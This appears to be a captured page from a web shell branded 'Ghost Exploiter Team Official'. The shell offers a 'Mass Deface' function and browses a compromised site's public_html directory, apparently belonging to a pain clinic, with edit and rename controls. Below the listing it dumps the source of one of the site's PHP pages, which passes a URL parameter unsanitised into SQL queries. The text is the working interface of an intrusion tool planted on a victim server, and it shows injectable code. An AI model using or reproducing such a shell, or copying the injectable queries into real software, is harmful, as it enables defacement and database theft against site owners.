Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home2
/
ajwaeing
/
public_html
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
.well-known
--
ren
ClinicTemplate_files
--
ren
administrator
--
ren
bootstrap
--
ren
css
--
ren
fonts
--
ren
images
--
ren
js
--
ren
kcfinder
--
ren
about-us.php
2.021KB
edt
ren
ceo-message.php
2.024KB
edt
ren
contact-us.php
6.12KB
edt
ren
contents.php
2.534KB
edt
ren
dbConnection.php
1.073KB
edt
ren
education.php
4.847KB
edt
ren
epage.php
2.441KB
edt
ren
error_log
7.518KB
edt
ren
fincludes.php
0.753KB
edt
ren
footer.php
2.343KB
header.php
5.672KB
edt
ren
includes.php
1.394KB
edt
ren
index.php
8.65KB
edt
ren
our-team.php
3.184KB
edt
ren
services.php
2.176KB
edt
ren
slider.php
2.43KB
edt
ren
staff.php
3.029KB
edt
ren
why-us.php
2.235KB
edt
ren
<?php require_once "dbConnection.php"; $db = new dbConnection(); if(isset($_GET["cid"]) && !empty($_GET["cid"])) { $cid = $_GET["cid"]; $qry = "SELECT * FROM categories WHERE ID = $cid LIMIT 1"; $res = $db -> query($qry); $row = $db -> fetch($res); $xtitle = stripslashes($row["title"]); } ?> <!doctype html> <html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="keywords" content="<?=$xtitle?>"> <meta name="description" content="<?=$xtitle?>"> <title><?=$xtitle?> :. Premier Pain Centers P. A.</title> <?php require_once "includes.php"; ?> </head> <body> <div class="body-wrapper" id="page-top"> <?php require_once "header.php"; ?> <!-- Page Title --> <section class="page-title"> <div class="container"> <div class="row"> <div class="col-sm-12 col-md-12" id="title"> <div class="page-title-inner"> <h2><?=$xtitle?></h2> </div> </div> </div> </div> </section> <!-- /Page Title --> <!-- Main Body --> <section class="main-body symptoms"> <div class="container"> <div class="row"> <div id="left" class="col-sm-3"> <div class="module title3"> <ul class="nav menu"> <?php $qry = "SELECT ID, title FROM categories WHERE parent = 36"; $res = $db -> query($qry); while($row = $db -> fetch($res)) { $ID = $row["ID"]; $title = stripslashes($row["title"]); $ntitle = str_replace("/", "", $title); $ntitle = str_replace(" ", "-", $ntitle); $ntitle = str_replace(" ", "-", $ntitle); if($ID == $cid) $x = "class='active'"; else $x = ''; ?> <li <?=$x?>><a href="education.php?cid=<?=$ID?>&cat=<?=$ntitle?>"><?=$title?></a></li> <?php } ?> </ul> </div> </div> <div id="middle" class="col-sm-9 col-md-9"> <?php $nqry = "SELECT * FROM categories WHERE parent = $cid"; $nres = $db -> query($nqry); $nrows = $db -> rows($nres); if($nrows > 0) { while($nrow = $db -> fetch($nres)) { $nid = $nrow["ID"]; $ncat = $nrow["title"]; $ncat2 = str_replace("/", "", $ncat); $ncat2 = str_replace(" ", "-", $ncat2); $ncat2 = str_replace(" ", "-", $ncat2); ?> <h3><?=$ncat?></h3> <hr> <?php $cqry = "SELECT ID, pgname, title, contents FROM contents WHERE category = $nid AND pgstatus = 1"; $cres = $db -> query($cqry); while($crow = $db -> fetch($cres)) { $pid = $crow["ID"]; $pgname = stripslashes($crow["pgname"]); $title = stripslashes($crow["title"]); $contents = stripslashes($crow["contents"]); $ncontents = substr($contents, 0, 400); ?> <h5 class="uk-text-primary"><?=$title?></h5> <p class="uk-text-justify"><?=$ncontents?><span class="uk-text-success"> ...</span></p> <p class="readmore"> <a class="btn btn-default" href="epage.php?cat=<?=$nid?>&pid=<?=$pid?>&pg=<?=$pgname?>"> Read more ... </a> </p> <p> </p> <?php } } } else { $cqry = "SELECT ID, pgname, title, contents FROM contents WHERE category = $cid AND pgstatus = 1"; //echo $cqry; $cres = $db -> query($cqry); while($crow = $db -> fetch($cres)) { $pid = $crow["ID"]; $pgname = stripslashes($crow["pgname"]); $title = stripslashes($crow["title"]); $contents = stripslashes($crow["contents"]); $ncontents = substr($contents, 0, 400); ?> <h5 class="uk-text-primary"><?=$title?></h5> <p class="uk-text-justify"><?=$ncontents?><span class="uk-text-success"> ...</span></p> <p class="readmore"> <a class="btn btn-default" href="epage.php?cat=<?=$cid?>&pid=<?=$pid?>&pg=<?=$pgname?>"> Read more ... </a> </p> <p> </p> <?php } } ?> </div> </div> </div> </section> <!-- /Main Body --> <?php require_once "footer.php"; ?> </div> <?php require_once "fincludes.php"; ?> </body> </html>